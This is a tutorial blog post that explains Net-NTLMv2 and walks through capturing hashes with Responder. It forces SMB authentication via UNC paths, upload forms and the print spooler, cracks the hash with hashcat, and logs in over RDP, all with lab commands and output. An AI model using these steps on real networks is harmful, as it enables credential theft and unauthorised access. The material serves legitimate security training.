Cracking Net-NTLMv2: Concepts & Responder

Published on June 25, 2025

What is Net-NTLMv2?

Net-NTLMv2 is Microsoft’s challenge–response authentication protocol used over networks (e.g., SMB, HTTP). Instead of sending a password, the client proves knowledge of its NTLM hash by encrypting a server-supplied nonce (challenge) with HMAC-MD5:

  1. Client requests access to a resource.
  2. Server responds with a random challenge (8 bytes).
  3. Client computes HMAC-MD5(challenge, NTLMv2_hash) + client nonce + timestamp.
  4. Client sends this “response” back.
  5. Server verifies by computing the same HMAC using the stored NTLM hash.

Because the challenge is random and the response includes a timestamp and client nonce, replay is more difficult than with NTLMv1—but capture-and-offline-crack remains trivial once you have the blob.

Why Not Mimikatz?

Mimikatz reads cleartext and hashes from LSASS memory, but on many targets you’ll only have an unprivileged shell without Administrator or SeDebugPrivilege. Without SYSTEM rights, Mimikatz cannot access LSASS, so you must resort to network-level capture of Net-NTLMv2.

Introducing Responder

Responder is a network-poisoning tool that:

  • Implements rogue protocol servers (SMB, HTTP, FTP).
  • Poisons name resolution (LLMNR, NBT-NS, mDNS) to force clients to authenticate.
  • Captures Net-NTLMv2 challenge–response blobs for offline cracking.

We’ll focus on its built-in SMB server to capture Net-NTLMv2 from an unprivileged user.

Step-by-Step Capture & Crack

1. Identify Your Interface

kali@kali:~$ ip a

Explanation: Lists network interfaces and IPs; note the one reachable by target (e.g., tap0: 192.168.119.2/24).

2. Start Responder

kali@kali:~$ sudo responder -I tap0

Explanation: -I selects interface; Responder now serves SMB and poisons LLMNR/NBT-NS to capture hashes.

3. Force Authentication from Target

C:\> dir \\192.168.119.2\test

Explanation: UNC path lookup forces the Windows host to authenticate to our SMB server—even if share “test” doesn’t exist.

4. Observe Captured Blob


[SMB] NTLMv2-SSP Client   : ::ffff:192.168.50.211
[SMB] NTLMv2-SSP Username : FILES01\paul
[SMB] NTLMv2-SSP Hash     : paul::FILES01:…:01010000…:…

Explanation: Responder displays the full challenge–response string; copy it into paul.hash on Kali.

5. Save the Hash

kali@kali:~$ echo "paul::FILES01:…:01010000…:…" > paul.hash

Explanation: Stores the captured blob for cracking.

6. Identify Hashcat Mode

kali@kali:~$ hashcat --help | grep -i ntlmv2

Explanation: Returns 5600 | NetNTLMv2, the mode for Net-NTLMv2 blobs.

7. Crack with Hashcat

kali@kali:~$ hashcat -m 5600 paul.hash \
  /usr/share/wordlists/rockyou.txt --force

Explanation: -m 5600: NetNTLMv2 mode; rockyou.txt: wordlist; --force: ignore minor warnings.

Result reveals paul:123Password123.

8. Verify Credentials

mstsc /v:192.168.50.211 /u:FILES01\paul

Explanation: Connect via RDP using the cracked password to confirm access.

Alternate Forcing Methods

  • Web upload UNC: Submit a path like \\192.168.119.2\share\dummy.txt in file-upload forms to trigger authentication.
  • Print spooler abuse: Use net use or print /d:\\192.168.119.2\printer to force SMB auth.

Key Takeaways

  • Net-NTLMv2 is a challenge–response protocol using HMAC-MD5 over the client’s NTLM hash.
  • Unprivileged shells cannot use Mimikatz, so network capture via Responder is required.
  • Responder poisons name resolution and hosts rogue SMB to log authentication attempts.
  • Captured Net-NTLMv2 blobs can be cracked offline (Hashcat mode 5600) to recover plaintext.

Linked Articles